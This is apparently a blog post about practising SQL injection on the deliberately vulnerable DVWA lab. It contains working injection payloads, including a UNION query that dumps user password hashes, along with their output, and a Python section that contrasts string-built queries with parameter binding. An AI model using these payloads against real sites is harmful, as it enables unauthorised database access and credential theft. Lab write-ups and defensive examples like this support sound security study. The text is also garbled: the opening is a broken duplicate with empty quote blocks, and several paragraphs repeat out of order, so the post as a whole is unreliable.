SQL injection
This time I will tell you a little about the sql injection I am studying. I learned by practising directly in DVWA (Damn Vulnerable Web Application). I started from the low level, and here is the php source that must be injected:
"
"
at this level no matter what we enter is filtered by the program so that we can enter a query that can cause programs to display all the contents of the database for exemple we can we can insert :
1' or '1'='1
so the sql query to be :
The following results:
"
"
at this level there is little filters that cause we can not enter the quotes, but it is not a problem because we do not need it anymore for this syntax. We get through by entering the following syntax:
1 or 1=1
so the sql query to be :
at the medium level is not much different from the low level. after graduating from the low and medium level is now high time to enter the territory level, and php source code follows:
"
"
for this high level I have not been able to solve real, but if in a dream I've had 3 times the dream of getting a way to inject the source code.
"
<?php
if (isset($_GET['Submit'])) {
    // Retrieve data
    $id = $_GET['id'];
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>');
    $num = mysql_numrows($result);
    $i = 0;
    while ($i < $num) {
        $first = mysql_result($result, $i, "first_name");
        $last = mysql_result($result, $i, "last_name");
        echo '<pre>';
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
        echo '</pre>';
        $i++;
    }
}
?>
"
At this level nothing we enter is filtered by the program, so we can enter a query that causes the program to display all the contents of the database. For example we can insert:
1' or '1'='1
so the sql query becomes:
SELECT first_name, last_name FROM users WHERE user_id = '1' or '1'='1'
The following results:
ID: 1' or '1' ='1 First name: admin Surname: admin
ID: 1' or '1' ='1 First name: Gordon Surname: Brown
ID: 1' or '1' ='1 First name: Hack Surname: Me
ID: 1' or '1' ='1 First name: Pablo Surname: Picasso
ID: 1' or '1' ='1 First name: Bob Surname: Smith
This makes the condition always true, so the application displays all the contents of the database. The low level has been solved; now we move on to the medium level, and here is the php source that we must get past to inject the database:
"
<?php
if (isset($_GET['Submit'])) {
    // Retrieve data
    $id = $_GET['id'];
    $id = mysql_real_escape_string($id);
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>');
    $num = mysql_numrows($result);
    $i = 0;
    while ($i < $num) {
        $first = mysql_result($result, $i, "first_name");
        $last = mysql_result($result, $i, "last_name");
        echo '<pre>';
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
        echo '</pre>';
        $i++;
    }
}
?>
"
At this level there is a small filter that prevents us from entering quotes, but that is not a problem because we no longer need them for this syntax. We get through by entering the following:
1 or 1=1
so the sql query becomes:
SELECT first_name, last_name FROM users WHERE user_id = 1 or 1=1
ID: 1 or 1=1 First name: admin Surname: admin
ID: 1 or 1=1 First name: Gordon Surname: Brown
ID: 1 or 1=1 First name: Hack Surname: Me
ID: 1 or 1=1 First name: Pablo Surname: Picasso
ID: 1 or 1=1 First name: Bob Surname: Smith
or in this way:
SELECT first_name, last_name FROM users WHERE user_id = 1 union all select user,password from users--
The following results:
ID: 1 union all select user,password from users-- First name: admin Surname: admin
ID: 1 union all select user,password from users-- First name: admin Surname: 900150983cd24fb0d6963f7d28e17f72
ID: 1 union all select user,password from users-- First name: gordonb Surname: e99a18c428cb38d5f260853678922e03
ID: 1 union all select user,password from users-- First name: 1337 Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: 1 union all select user,password from users-- First name: pablo Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: 1 union all select user,password from users-- First name: smithy Surname: 5f4dcc3b5aa765d61d8327deb882cf99
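To show, from the defender's side, why the low and medium levels above give way and what the fix looks like, here is an added Python example; it is not part of the original post and not DVWA's code. It emulates the three ways of building the query on an in-memory SQLite table with constructed sample rows (the names follow DVWA's demo accounts, the password values are placeholders, not hashes). `escape_like_mysql` is a hypothetical imitation of `mysql_real_escape_string`, not the real function, and SQLite stands in for MySQL.

```python
import sqlite3

# Constructed sample data modelled on DVWA's demo users table.
# The password values are placeholders, not real hashes.
USERS = [
    (1, "admin",   "admin",  "admin",   "placeholder-hash-1"),
    (2, "gordonb", "Gordon", "Brown",   "placeholder-hash-2"),
    (3, "1337",    "Hack",   "Me",      "placeholder-hash-3"),
    (4, "pablo",   "Pablo",  "Picasso", "placeholder-hash-4"),
    (5, "smithy",  "Bob",    "Smith",   "placeholder-hash-5"),
]


def _connect() -> sqlite3.Connection:
    """Fresh in-memory database holding the sample users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT, "
        "first_name TEXT, last_name TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", USERS)
    return conn


def escape_like_mysql(value: str) -> str:
    """Hypothetical imitation of mysql_real_escape_string(): backslash-escape
    quotes, backslashes, NUL, newline, carriage return and Ctrl-Z."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in value)


def lookup_low(user_id: str):
    """Mirrors DVWA low: the raw id is spliced into a quoted SQL literal."""
    conn = _connect()
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_medium(user_id: str):
    """Mirrors DVWA medium: quotes are escaped, but the id is interpolated
    without quotes, so a payload that needs no quotes passes untouched.
    Returns None where DVWA would die() with a database error."""
    conn = _connect()
    sql = ("SELECT first_name, last_name FROM users WHERE user_id = "
           + escape_like_mysql(user_id))
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def lookup_safe(user_id: str):
    """Hardened form: the id travels as a bound parameter, so it is always
    data and never becomes part of the SQL text."""
    conn = _connect()
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    # The post's own payloads, run against each query style.
    for payload in ("1", "1' or '1'='1", "1 or 1=1",
                    "1 union all select user,password from users--"):
        print(f"input: {payload!r}")
        print("  low:   ", lookup_low(payload) if "'" in payload or payload.isdigit()
              else "(quoted literal: no match)")
        print("  medium:", lookup_medium(payload))
        print("  safe:  ", lookup_safe(payload))
```

Running the file prints the rows each style returns for the post's payloads. The point is that escaping only protects a value that sits inside quotes; once the id is interpolated bare, `1 or 1=1` and the `union all` payload contain nothing to escape. Binding the id as a parameter keeps it data whatever it contains, and a type check like the `is_numeric()` in the high level source belongs alongside parameter binding, not instead of it.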
At the medium level it is not much different from the low level. After passing the low and medium levels it is now time to enter the high level, and the php source code follows:
"
<?php
if (isset($_GET['Submit'])) {
    // Retrieve data
    $id = $_GET['id'];
    $id = stripslashes($id);
    $id = mysql_real_escape_string($id);
    if (is_numeric($id)) {
        $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
        $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>');
        $num = mysql_numrows($result);
        $i = 0;
        while ($i < $num) {
            $first = mysql_result($result, $i, "first_name");
            $last = mysql_result($result, $i, "last_name");
            echo '<pre>';
            echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
            echo '</pre>';
            $i++;
        }
    }
}
?>
"
For this high level I have not been able to solve it for real, but in a dream, which I have had 3 times, I found a way to inject the source code.